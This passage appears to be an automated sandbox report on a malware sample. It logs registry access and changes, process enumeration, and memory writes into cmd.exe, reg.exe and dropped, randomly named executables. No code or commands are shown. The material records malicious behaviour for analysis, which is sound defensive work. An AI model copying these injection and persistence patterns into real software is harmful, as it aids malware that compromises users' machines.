Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2008 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Users\Admin\mSgYkYQw\lWwscwwc.exe
PID 2008 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Users\Admin\mSgYkYQw\lWwscwwc.exe
PID 2008 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Users\Admin\mSgYkYQw\lWwscwwc.exe
PID 2008 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\ProgramData\RogQUwEA\IOcYUcsQ.exe
PID 2008 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\ProgramData\RogQUwEA\IOcYUcsQ.exe
PID 2008 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\ProgramData\RogQUwEA\IOcYUcsQ.exe
PID 2008 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 1792 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 1792 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 2008 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2008 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2864 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 2864 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
